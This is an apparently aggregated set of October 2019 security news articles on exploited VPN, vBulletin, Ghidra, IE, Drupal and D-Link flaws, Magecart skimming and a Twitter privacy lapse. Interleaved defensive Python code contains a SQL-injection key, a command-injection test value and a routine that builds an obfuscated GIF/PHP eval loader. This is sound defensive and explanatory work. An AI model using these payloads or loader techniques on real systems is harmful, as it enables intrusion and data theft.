“Multiple Nation State Advanced Persistent Threat (APT) actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379 to gain access to vulnerable VPN devices.” reads the security advisory published by the NSA.

“If a malicious actor previously exploited the vulnerability to collect legitimate credentials, these credentials would still be valid after patching. NSA recommends resetting credentials after a vulnerable VPN device is upgraded and before it is reconnected to the external network:

  • Immediately update VPN user, administrator, and service account credentials.
  • Immediately revoke and generate new VPN server keys and certificates. This may require redistributing VPN connection information to users.
  • If compromise is suspected, review accounts to ensure no new accounts were created by adversaries.”

Both the NCSC and the NSA confirmed that APT groups targeted several sectors, including military, government, academic, business and healthcare. The security advisories published by the agencies did not name any of the APTs leveraging the above VPN vulnerabilities.

In August, BadPackets experts observed mass scanning activity targeting Pulse Secure “Pulse Connect Secure” VPN endpoints vulnerable to CVE-2019-11510. At the time, over 14,000 vulnerable Pulse Secure endpoints were hosted by more than 2,500 organizations. The number of vulnerable endpoints dropped to roughly 6,000 by October 8, most of them in the United States, Japan and the UK.

Pierluigi Paganini

(SecurityAffairs – VPN vulnerabilities, hacking)


vBulletin addresses three new high-severity vulnerabilities

vBulletin has recently published a new security patch update that addresses three high-severity vulnerabilities in the popular forum software.

vBulletin has recently published a new security patch update that addresses three high-severity flaws in vBulletin 5.5.4 and prior versions.

The vulnerabilities could be exploited by remote attackers to take complete control over targeted web servers and steal sensitive user information.

The first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw reported by security researcher Egidio Romano.

The vulnerability resides in the way the vBulletin forum handles user requests to update profile avatars; a remote attacker could exploit it to inject and execute arbitrary PHP code on the target server through unsanitized parameters. The vulnerability cannot be triggered in a default installation of the vBulletin forum.

“User input passed through the “data[extension]” and “data[filedata]” parameters to the “ajax/api/user/updateAvatar” endpoint is not properly validated before being used to update users’ avatars. This can be exploited to inject and execute arbitrary PHP code.” reads the security advisory. “Successful exploitation of this vulnerability requires the “Save Avatars as Files” option to be enabled (disabled by default).”

Proof-of-concept code is available at the following URL:

http://karmainsecurity.com/pocs/CVE-2019-17132

The remaining critical vulnerabilities addressed by vBulletin are two SQL injection issues, both tracked as CVE-2019-17271.

“1) User input passed through keys of the “where” parameter to the “ajax/api/hook/getHookList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through in-band SQL injection attacks. Successful exploitation of this vulnerability requires a user account with the “canadminproducts” or “canadminstyles” permission.” reads the security advisory.

“2) User input passed through keys of the “where” parameter to the “ajax/api/widget/getWidgetList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through time-based SQL injection attacks. Successful exploitation of this vulnerability requires a user account with the “canusesitebuilder” permission.”

The two vulnerabilities could allow administrators with restricted privileges to read sensitive data from the database.
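The bug class behind both SQL injection issues, as an added illustration in Python with a constructed table (not vBulletin's code or schema): the *keys* of the "where" mapping become column identifiers in the SQL text, and placeholders cannot bind identifiers, so binding the values alone does not help. The hardened variant validates every key against an allowlist of filterable columns before it reaches the query.

```python
import re
import sqlite3

# Constructed stand-in for a forum's hook table; not vBulletin's real schema.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE hook (hookid INTEGER, title TEXT, active INTEGER);
        INSERT INTO hook VALUES (1, 'welcome_banner', 1);
        INSERT INTO hook VALUES (2, 'footer_links', 0);
        """
    )
    return con


def get_hook_list_vulnerable(con: sqlite3.Connection, where: dict) -> list:
    """Filter hooks by a caller-supplied {column: value} mapping.

    The values are bound as parameters, but the keys are pasted into the SQL
    text as identifiers without any validation, which is the pattern the
    advisory describes for the "where" parameter.
    """
    clauses = " AND ".join(f"{column} = ?" for column in where)
    sql = f"SELECT hookid, title FROM hook WHERE {clauses}"
    return con.execute(sql, list(where.values())).fetchall()


# Identifiers may only be columns the endpoint is meant to filter on.
ALLOWED_COLUMNS = {"hookid", "title", "active"}
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def get_hook_list_hardened(con: sqlite3.Connection, where: dict) -> list:
    """Same query, but every key must be a known column before it touches SQL."""
    if not where:
        raise ValueError("at least one filter column is required")
    for column in where:
        if not IDENTIFIER_RE.match(column) or column not in ALLOWED_COLUMNS:
            raise ValueError(f"unexpected filter column: {column!r}")
    clauses = " AND ".join(f"{column} = ?" for column in where)
    sql = f"SELECT hookid, title FROM hook WHERE {clauses}"
    return con.execute(sql, list(where.values())).fetchall()


def demo() -> tuple:
    """Run both variants against a key that is SQL rather than a column name."""
    con = make_db()
    crafted = {"1=1 OR hookid": 1}                    # becomes "... WHERE 1=1 OR hookid = ?"
    leaked = get_hook_list_vulnerable(con, crafted)   # filter bypassed: every row comes back
    try:
        get_hook_list_hardened(con, crafted)
        blocked = False
    except ValueError:
        blocked = True                                # allowlist rejects the key up front
    return len(leaked), blocked


if __name__ == "__main__":
    print(demo())   # (2, True)
```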

Romano reported all the flaws to the vBulletin maintainers on September 30, and the maintainers then released the security patch updates.

Last month, vBulletin released a patch for a critical zero-day remote code execution vulnerability.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)


Hackers compromised Volusion infrastructure to siphon card details from thousands of sites

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users.

Volusion is a privately held technology company that provides ecommerce software and marketing and web design services for small and medium-sized businesses. The company has over 250 employees and has served more than 180,000 customers since its founding in 1999.

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users. Experts report more than 6,500 stores have been hacked, but they believe that tens of thousands of e-commerce platforms may have been compromised.

The discovery was made by Check Point security researcher Marcel Afrahim, who shared his findings in a blog post on Medium.

The researcher initially noticed that the Sesame Street Live online store was compromised; it is built with Volusion’s All-in-One E-commerce Website Builder and its DNS is served by Volusion’s name servers.

While analyzing the checkout page, the expert noticed that all the resources were loading from sesamestreetlivestore.com or volusion.com-affiliated websites, except for an odd JavaScript file being loaded from storage.googleapis.com from a bucket named volusionapi.

This suggests that hackers gained access to Volusion’s Google Cloud infrastructure and were able to inject into a JavaScript file the malicious code that siphons payment card details.


The compromised script was located at https://storage.googleapis.com/volusionapi/resources.js and is loaded on Volusion-based online stores via the /a/j/vnav.js file.

“At its core, the additional code consists of two sections. The first section is reading the values entered at the Credit Card information fields and after a series of checks, it’s Base64 encoded along with serialization and simple shift operation, So that a simple Base64 deobfuscation would not reveal the data.” reads the post published by the researcher. “The second part of the script is responsible for reading that data stored and posting it to their primary server hxxps://volusion-cdn.com/analytics/beacon.”

Who is behind the attack?

The attackers’ TTPs suggest the involvement of one of the Magecart groups, which in the past have already used public cloud storage to host their malicious scripts.

In a report recently published by RiskIQ, the experts estimated that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them supply-chain attacks.

Pierluigi Paganini

(SecurityAffairs – Volusion, hacking)


Twitter inadvertently used Phone Numbers collected for security for Ads

Twitter admitted having “inadvertently” used phone numbers and email addresses, collected for security purposes, for advertising.

Twitter apologized for having used phone numbers and email addresses, provided by users for security purposes, for advertising. According to the social media company, data used for account authentication were also matched against advertisers’ databases to improve the targeting of ads.

“We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system.” reads a post published by Twitter.

At the time of writing, the number of impacted Twitter users is unclear.

The company attempted to downplay the severity of the privacy incident, highlighting that none of the user data was shared with partners outside the company.

The Twitter Tailored Audiences product allows advertisers to target ads to customers based on the advertiser’s own marketing lists, which include information such as email addresses or phone numbers. Partner Audiences allows advertisers to use the same Tailored Audiences features to target ads to audiences provided by third-party partners.

Twitter admitted that when an advertiser uploaded their marketing list, its staff may have matched the information included in these lists with data provided by its users to protect their accounts.

The root cause of the problem was addressed on September 17, 2019.

“We cannot say with certainty how many people were impacted by this, but in an effort to be transparent, we wanted to make everyone aware. No personal data was ever shared externally with our partners or any other third parties.” added Twitter.

“We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again.”

Pierluigi Paganini

(SecurityAffairs – Twitter, privacy)


Researchers discovered a code execution flaw in NSA GHIDRA

Security researchers discovered a code-execution vulnerability that affects versions through 9.0.4 of the Ghidra software reverse engineering (SRE) framework.

GHIDRA is a multi-platform reverse engineering framework that runs on major OSs (Windows, macOS, and Linux).

The framework was first mentioned in the CIA Vault 7 dump that was leaked in 2017. WikiLeaks obtained thousands of files allegedly originating from a CIA high-security network that detail CIA hacking techniques, tools, and capabilities. Digging into the huge trove of files, it is also possible to find information about GHIDRA, a Java-based reverse engineering tool.

The NSA released the Ghidra suite in March; it can be used to find vulnerabilities and security holes in applications.

Ghidra is Apache 2.0-licensed and requires a Java runtime; it is available for download here. Of course, some fear the US agency may have introduced a backdoor into the suite, but the NSA has denied it.

A couple of weeks ago, security researchers discovered a vulnerability in the Ghidra tool, tracked as CVE-2019-16941, that could be exploited by an attacker to execute arbitrary code within the context of the affected application. The researchers found that the flaw can be exploited only when experimental mode is enabled.

The vulnerability resides in the Read XML Files feature of the Bit Patterns Explorer; an attacker could exploit it by supplying a modified XML document.

“NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document.” reads the security advisory. “This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call).”

The vulnerability has been rated as “critical severity” and received a CVSS score of 9.8.

The NSA attempted to downplay the severity of the flaw explaining that it is hard to exploit.

The good news is that the issue has already been fixed; a patch is available for those who build Ghidra themselves from the master branch.

The Ghidra 9.1 release, which is currently in beta testing, will also address the flaw.

Pierluigi Paganini

(SecurityAffairs – NSA, hacking)


MS October 2019 Patch Tuesday updates address 59 flaws

Microsoft’s October 2019 Patch Tuesday addressed a total of 59 vulnerabilities, 9 of which are rated as critical and 49 as important.

The tech giant released its October 2019 Patch Tuesday security updates to address a total of 59 vulnerabilities in Windows operating systems and other software, 9 of which are rated as ‘critical’, 49 are ‘important’, and one ‘moderate’.

None of the vulnerabilities addressed by Microsoft were exploited by attackers in the wild or were publicly known before the release.

Microsoft addressed two critical remote code execution flaws, tracked as CVE-2019-1238 and CVE-2019-1239, in the VBScript engine; both are tied to the way VBScript handles objects in memory. An attacker could exploit the flaws to cause memory corruption and execute arbitrary code in the context of the current user.

An attacker could trigger the flaws by tricking the victims into visiting a specially crafted website through Internet Explorer.

The attacker could also exploit these flaws using an application or Microsoft Office document that embeds an ActiveX control marked ‘safe for initialization’ that leverages the Internet Explorer rendering engine.

Microsoft addressed three critical memory corruption flaws in the Chakra scripting engine that could lead to remote code execution. The vulnerabilities affect the way the Chakra scripting engine handles objects in memory in Microsoft Edge.

Microsoft has also addressed a reverse RDP attack: a critical remote code execution issue in the Windows built-in Remote Desktop Client that an attacker could exploit to compromise client computers connecting to a malicious RDP server.

The attack scenario sees threat actors tricking victims into connecting to a malicious RDP server.

The October 2019 Patch Tuesday security updates also addressed two NTLM authentication vulnerabilities, tracked as CVE-2019-1166 and CVE-2019-1338, that could be exploited by attackers to bypass the MIC (Message Integrity Code) protection on NTLM authentication.

“A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features.” reads the security advisory for CVE-2019-1166.

“To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.”

The full list of vulnerabilities addressed with the release of the October 2019 Patch Tuesday updates is available here.

Pierluigi Paganini

(SecurityAffairs – October 2019 Patch Tuesday updates, hacking)


Experts found a link between a Magecart group and Cobalt Group

Researchers from MalwareBytes and HYAS Threat Intelligence linked one of the hacking groups under the Magecart umbrella to the notorious Cobalt cybercrime Group.

Hacker groups under the Magecart umbrella continue to target organizations worldwide to steal payment card data with so-called software skimmers. Security firms have monitored the activities of at least a dozen groups since 2010.

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, MyPillow and Amerisleep, and Feedify.

Millions of Magecart instances have been detected over time, and security experts have discovered tens of software skimming scripts.

Researchers at RiskIQ estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them supply-chain attacks.

The same team of experts has determined that the Magecart infrastructure is vast, with 573 known C2 domains and 9,189 hosts observed loading C2 domains.

A new joint report published by researchers at Malwarebytes and HYAS Threat Intelligence reveals that one of the groups under the Magecart umbrella is linked to the Cobalt cybercrime group.

The experts found a link between Magecart Group 4 and the Cobalt cybercrime gang, in the form of patterns in the email addresses used to register domains used in Magecart operations.

“One group that caught our interest is Group 4, which is one of the more advanced cybercriminal organizations. While working jointly with security firm HYAS, we found some interesting patterns in the email addresses used to register domains belonging to Magecart matching those of a sophisticated threat group known as Cobalt Group, aka Cobalt Gang or Cobalt Spider.” reads the blog post published by MalwareBytes.

The Cobalt crime gang is a Russian hacking crew that has been active since at least 2016 and has targeted banks worldwide. The group leveraged spear-phishing emails to compromise target systems, spoofing emails from financial institutions or a financial supplier/partner.

Experts pointed out that Group 4, unlike other Magecart groups, relies on both client-side and server-side skimmers.

One of the client-side skimmers analyzed by the researchers masqueraded as the jquery.mask.js plugin: the attackers appended the malicious code to the end of the script and protected it with several layers of obfuscation.

Experts also analyzed a server-side skimmer, a PHP script that was mistakenly served as JavaScript.

“This little code snippet looks for certain keywords associated with a financial transaction and then sends the request and cookie data to the exfiltration server at secureqbrowser[.]com. An almost exact copy of this script was described by Denis Sinegubko of Sucuri in his post Autoloaded Server-Side Swiper.” continues the report.

Experts noticed that in both attacks, the domains were registered to robertbalbarran(at)protonmail.com.

The analysis of the exfiltration gates allowed the researchers to link them to other registrant emails and to identify a pattern in the format of the email addresses ([first name][initial][last name]).

Experts noticed that the Cobalt Group has also switched to this naming convention.

“A small shift from one of their previous conventions of [firstname],[lastname], [fournumbers] (overwhelmingly using protonmail accounts, with a handful of tutanota/keemail.me email accounts) changed to the above-noted convention of [firstname], [initial], [lastname] again using the same email services and registrars, and notably the same use of privacy protection services.” continue the experts.

Further investigation allowed the experts to discover that 10 of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.

One email address, petersmelanie(at)protonmail.com, was used to register 23 domains, including one involved in a phishing campaign leveraging the CVE-2017-0199 flaw and other attacks against Oracle and various banks.

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it’s logical to conclude that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” concludes the report. “The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat.”

Pierluigi Paganini

(SecurityAffairs – Magecart, Cobalt group)

The post Experts found a link between a Magecart group and Cobalt Group appeared first on Security Affairs.

Users reported problems with patches for CVE-2019-1367 IE zero-day

Patches for Internet Explorer Zero-Day Causing Problems for Many Users

Microsoft released a new set of patches for a recently fixed zero-day flaw in Internet Explorer after users reported problems with the previous patch.

On September 23, Microsoft released an out-of-band patch to address a zero-day memory corruption flaw in Internet Explorer (CVE-2019-1367) that has been exploited in attacks in the wild.

The vulnerability resides in Internet Explorer’s scripting engine and affects the way objects in memory are handled.

An attacker could exploit the vulnerability to gain the same privileges as the current user; the impact is critical if the current user has administrative privileges.

In order to exploit the vulnerability, an attacker could host a specially crafted website designed to trigger the flaw when Internet Explorer users visit it. The attacker only has to trick victims into visiting the malicious website, for example by sending them a link via email or a malicious email attachment (HTML file, PDF file, Microsoft Office document) that supports embedding the scripting engine content.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the security advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. “

On October 3, Microsoft released another set of patches for the zero-day vulnerability, because some users experienced printing issues following the installation of the patches initially released by the tech giant.

“To address a known printing issue customers might experience after installing the Security Updates or IE Cumulative updates that were released on September 23, 2019 for CVE-2019-1367, Microsoft is releasing new Security Updates, IE Cumulative Updates, and Monthly Rollup updates for all applicable installations of Internet Explorer 9, 10, or 11 on Microsoft Windows,” reads the Microsoft Security Update Releases notification email sent to users.

Several users reported that the cumulative update released by Microsoft is also causing boot issues and Start menu crashes.

Microsoft pointed out that the IE Cumulative updates are separate from the October Patch Tuesday updates which are scheduled for October 8.

Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild

Researchers from Akamai uncovered a new campaign targeting the Drupalgeddon2 vulnerability to deliver malware.

The popular security expert Larry W. Cashdollar from Akamai has uncovered a new campaign targeting the popular Drupalgeddon2 vulnerability (CVE-2018-7600) to deliver malware.

Drupalgeddon2 is a “highly critical” vulnerability that affects Drupal 7 and 8 core; it could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing a URL.

The Drupal development team fixed the vulnerability in March 2018, but hackers continue to target Drupalgeddon2 in the wild.

The campaign recently discovered by Cashdollar involves attackers attempting to run malicious code embedded in a .gif file.

The expert explained that the campaign is currently not widespread, but it targets a broad range of high-profile websites.

“I observed an attack that is designed to run code that is embedded inside a .gif file. While embedding code in an image file isn’t a new attack method, I haven’t seen this method in quite some time.” reads the analysis published by Cashdollar.

“The attack traffic doesn’t appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high profile websites. The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil.”

One of the .gif files analyzed by the expert was hosted on a compromised bodysurfing website located in Brazil. The file contained obfuscated PHP code designed to decode base64-encoded malware that the threat actors had stored in a variable.

“The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings.” continues the analysis. “Then two different files are downloaded and then executed. The first, index.inc.gif, contains obfuscated PHP code. It contains a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding.”

The malware supports several functions, such as scanning local files for credentials, sending email with the discovered credentials, replacing the local .htaccess file, displaying MySQL my.cnf configuration files, executing a remote file that is gzip-compressed and base64-encoded, showing system information, renaming files, uploading files, and launching a web shell.
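Both the Group 4 server-side skimmer (a PHP script served as JavaScript) and the Drupalgeddon2 loader index.inc.gif (a GIF header followed by PHP obscured with gzip, rot13 and base64) are files whose declared type disagrees with their content. The following is an added example, not code from Akamai or Malwarebytes: a defender-side check that flags such mismatches and unwraps the base64 -> rot13 -> gzinflate chain when it appears in the common one-line `eval(...)` form. The sample file is constructed here; the exact loader syntax is an assumption, since the reports do not reproduce it.

```python
import base64
import re
import zlib
from typing import List, Optional

# Magic bytes for the image types a skimmer or loader might hide behind.
IMAGE_MAGIC = {
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# The decoding chain described for index.inc.gif (base64 -> rot13 -> gzip) as it
# would appear in a one-line PHP loader (assumed form; only this nesting is unwrapped).
LOADER_RE = re.compile(
    rb"eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\("
    rb"\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)\s*\)"
)


def sniff_type(data: bytes) -> str:
    """Classify a blob by its leading magic bytes; anything else is treated as text."""
    for magic, mime in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return mime
    return "text"


def rot13_bytes(data: bytes) -> bytes:
    """PHP str_rot13 semantics: rotate ASCII letters only, leave every other byte alone."""
    out = bytearray()
    for b in data:
        if 0x41 <= b <= 0x5A:
            out.append((b - 0x41 + 13) % 26 + 0x41)
        elif 0x61 <= b <= 0x7A:
            out.append((b - 0x61 + 13) % 26 + 0x61)
        else:
            out.append(b)
    return bytes(out)


def unwrap_loader(data: bytes) -> Optional[bytes]:
    """Reverse the base64 -> rot13 -> raw-deflate chain and return the inner PHP stage,
    or None when the file carries no such loader or the payload does not decode."""
    m = LOADER_RE.search(data)
    if not m:
        return None
    try:
        # PHP gzinflate() consumes a raw DEFLATE stream, hence wbits=-15.
        return zlib.decompress(rot13_bytes(base64.b64decode(m.group(1))), -15)
    except (ValueError, zlib.error):
        return None


def inspect_file(name: str, data: bytes, content_type: str = "") -> List[str]:
    """Return findings for a file whose PHP content disagrees with its magic bytes,
    its extension, or the Content-Type it was served with."""
    findings: List[str] = []
    if not PHP_OPEN_TAG.search(data):
        return findings  # no PHP at all: nothing for this check to flag
    sniffed = sniff_type(data)
    if sniffed != "text":
        findings.append(f"{sniffed} header followed by PHP code")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in {"gif", "png", "jpg", "jpeg", "js", "css", "txt", "ico"}:
        findings.append(f"PHP open tag inside a .{ext} file")
    if "javascript" in content_type.lower():
        findings.append("PHP source served with a JavaScript Content-Type")
    if LOADER_RE.search(data):
        findings.append("eval(gzinflate(str_rot13(base64_decode(...)))) loader present")
    return findings


def build_sample_polyglot(inner: bytes) -> bytes:
    """Constructed test artefact: a GIF header followed by a PHP loader that hides
    `inner` behind the same three encoding layers. Not the real index.inc.gif."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw_deflate = comp.compress(inner) + comp.flush()
    blob = base64.b64encode(rot13_bytes(raw_deflate))
    return (b"GIF89a\x01\x00\x01\x00\x80\x00\x00"
            b"<?php eval(gzinflate(str_rot13(base64_decode('" + blob + b"')))); ?>")


if __name__ == "__main__":
    sample = build_sample_polyglot(b"<?php echo 'constructed inner stage'; ?>")
    for finding in inspect_file("index.inc.gif", sample):
        print("finding:", finding)
    print("inner stage:", unwrap_loader(sample))
```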

The campaign also delivers a piece of malware stored in a .txt file containing a Perl script that leverages Internet Relay Chat (IRC) for command and control (C&C) communication. The malware implements common RAT features and is also able to launch distributed denial-of-service (DDoS) attacks.

The malware also implements functions to gather information from the local system and to control infected hosts, and it supports a SQL flood command. The fact that attackers are still exploiting the Drupalgeddon2 flaw highlights the importance of patch management in enterprises.

“Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability’s exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems.” Cashdollar concludes. “This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems — creating a pivot point on the network.”

“Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take.” 

D-Link router models affected by remote code execution issue that will not be fixed

Researchers at Fortinet’s FortiGuard Labs have publicly disclosed a critical remote code execution vulnerability affecting some models of D-Link routers. 

Security experts at Fortinet’s FortiGuard Labs disclosed a remote code execution vulnerability tracked as CVE-2019-16920. The vulnerability is an unauthenticated command injection issue that was discovered in September 2019. The flaw has received a CVSS v3.1 base score of 9.8 and a CVSS v2.0 base score of 10.0.

The bad news for users is that the vendor will not address it because it affects discontinued products.

According to Fortinet, the vulnerability impacts D-Link firmware in the DIR-655, DIR-866L, DIR-652, and DHP-1565 router families.

“In September 2019, Fortinet’s FortiGuard Labs discovered and reported an unauthenticated command injection vulnerability (FG-VD-19-117/CVE-2019-16920) in D-Link products that could lead to Remote Code Execution (RCE) upon successful exploitation. We rated this as a critical issue since the vulnerability can be triggered remotely without authentication.” reads the security advisory published by Fortinet.

The vulnerability could be exploited by an attacker sending arbitrary input to a “PingTest” gateway interface to achieve command injection.

“The vulnerability begins with a bad authentication check. To see the problem in action, we start at the admin page and then perform a login action.” continues the advisory. “Here, we implement the POST HTTP Request to “apply_sec.cgi” with the action ping_test. We then perform the command injection in ping_ipaddr. Even if it returns the login page, the action ping_test is still performed – the value of ping_ipaddr will execute the “echo 1234” command in the router server and then send the result back to our server.”

The experts discovered that it is possible to execute code remotely, even without the necessary privileges, due to a bad authentication check.
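The advisory describes two separate defects: the login check fails open (the login page is returned but the ping_test action still runs), and the ping_ipaddr value reaches a shell unvalidated. As an added example, not D-Link’s firmware code, the hypothetical handler below shows how a hardened version of that request path closes both gaps: authentication gates every action before it runs, and the ping target is validated and passed to the process as a discrete argv element with no shell in between. The field names apply_sec.cgi, ping_test and ping_ipaddr are taken from the advisory; the ping options are an assumption.

```python
import ipaddress
import re
import subprocess
from typing import Dict, List, Optional

# RFC 1123 hostname: dot-separated labels of letters, digits and interior hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def validate_ping_target(value: str) -> Optional[str]:
    """Accept a literal IPv4/IPv6 address or a well-formed hostname and return it in
    canonical form; return None for anything else, so shell metacharacters, quotes,
    spaces and leading dashes (option smuggling) never reach the ping binary."""
    value = value.strip()
    if not value:
        return None
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    return value if HOSTNAME_RE.match(value) else None


def build_ping_argv(target: str) -> List[str]:
    """argv for the ping binary; the target is one argument, never part of a shell string."""
    return ["ping", "-c", "3", "-W", "2", target]


def handle_apply_sec(form: Dict[str, str], authenticated: bool,
                     execute: bool = False) -> dict:
    """Hypothetical hardened handler for the apply_sec.cgi ping_test action.

    Compared with the behaviour Fortinet describes: an unauthenticated request is
    rejected *before* any action is dispatched (instead of returning the login page
    while the ping still runs), and ping_ipaddr is validated and handed to
    subprocess without a shell, so there is no interpreter for injected text."""
    if not authenticated:
        return {"status": 401, "executed": False, "error": "login required"}
    if form.get("action") != "ping_test":
        return {"status": 400, "executed": False, "error": "unsupported action"}
    target = validate_ping_target(form.get("ping_ipaddr", ""))
    if target is None:
        return {"status": 400, "executed": False, "error": "invalid ping target"}
    argv = build_ping_argv(target)
    result = {"status": 200, "executed": True, "argv": argv}
    if execute:
        # shell=False is the default: the OS receives argv verbatim.
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=15)
        result["output"] = proc.stdout
        result["returncode"] = proc.returncode
    return result


if __name__ == "__main__":
    # Constructed requests: the second carries the injection shape the advisory mentions.
    print(handle_apply_sec({"action": "ping_test", "ping_ipaddr": "192.0.2.1"}, True))
    print(handle_apply_sec({"action": "ping_test", "ping_ipaddr": "192.0.2.1; echo 1234"}, True))
    print(handle_apply_sec({"action": "ping_test", "ping_ipaddr": "192.0.2.1"}, False))
```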

The researchers reported the vulnerability to D-Link on September 22; the vendor acknowledged the issue the following day, but three days later confirmed that no patch will be released because the products have reached End of Life (EOL).

Below is the disclosure timeline:

  • 22 September, 2019: FortiGuard Labs reported the vulnerability to D-Link.
  • 23 September, 2019: D-Link confirmed the vulnerability.
  • 25 September, 2019: D-Link confirmed these products are EOL.
  • 3 October, 2019: Public disclosure of the issue and advisory released.

US will help Baltic states to secure Baltic energy grid

The United States and the Baltic states announced cooperation to protect the Baltic energy grid from cyber attacks as the latter disconnect from the Russian electricity grid.

The US and the Baltic states agreed to cooperate to protect the Baltic energy grid from cyber attacks as the latter disconnect from the Russian electricity grid.

US Energy Secretary Rick Perry and his Lithuanian, Latvian and Estonian counterparts announced the cooperation for the protection of the Baltic energy grid against cyber attacks at this “critical moment.”

“We see a crucial role that US could play in assisting the Baltic States with strategic and technical support,” reads a joint declaration signed by the officials in the Lithuanian capital Vilnius.

The three states joined both the European Union and NATO in 2004, but they are still part of a power grid controlled by Russia. The three countries will be integrated into the European energy grid by 2025, ending their dependence on the Russian grid.

Lithuanian critical infrastructure, and in particular organizations in the energy sector, is a prime target of cyber attacks.

In May 2017, a wave of “exploratory” cyber attacks targeted the energy networks of the Baltic states. The attacks raised concerns that foreign states could disable the energy networks in the region.

Experts suspected the involvement of a Russian state actor due to the strategic interest of Russia in the states that are on the political front line between Russia and the West.

“Suspected Russia-backed hackers have launched exploratory cyber attacks against the energy networks of the Baltic states, sources said, raising security concerns inside the West’s main military alliance, NATO.” reported the Reuters agency, “The Baltics are locked into Russia’s power network but plan to synchronize their grids with the EU.”

NATO experts and cybersecurity researchers believe hackers were testing the Baltic energy networks for weaknesses.

Lithuania has now confirmed it is looking to US technology firms to help prevent attacks on energy control systems that could disrupt energy supplies.

“Energy minister Zygimantas Vaiciunas said the Baltic ministers also agreed with Perry to set up a cooperation platform for cyber security experts from all four countries within the next six months.” continues the AFP report.

Perry is promoting US liquefied natural gas (LNG) exports to Europe; both Lithuania and Poland have already begun importing it.

“We hope that all the citizens of Europe recognize that we certainly look at this (US LNG exports) as a great opportunity to bring more freedom to the marketplace, more competition to the marketplace,” Perry told reporters in Vilnius.

Data from Sephora and StreetEasy data breaches added to HIBP

The popular data breach notification service Have I Been Pwned? (HIBP) has added the stolen data from the StreetEasy and Sephora data incidents.

Have I Been Pwned? (HIBP), the popular service that allows users to check whether their personal data has been compromised in data breaches, has added the stolen data from the StreetEasy and Sephora incidents.

Users can check if their data have been exposed in the StreetEasy and Sephora data breaches.

The StreetEasy data breach took place in mid-2016 and exposed 988k records that included names, usernames, email addresses and SHA-1 password hashes. The data has been available for sale in the cybercrime underground since February. In February, the hacker Gnosticplayers offered a third round of databases containing millions of hacked accounts from unreported data breaches, including StreetEasy (real estate) with 990,000 records.

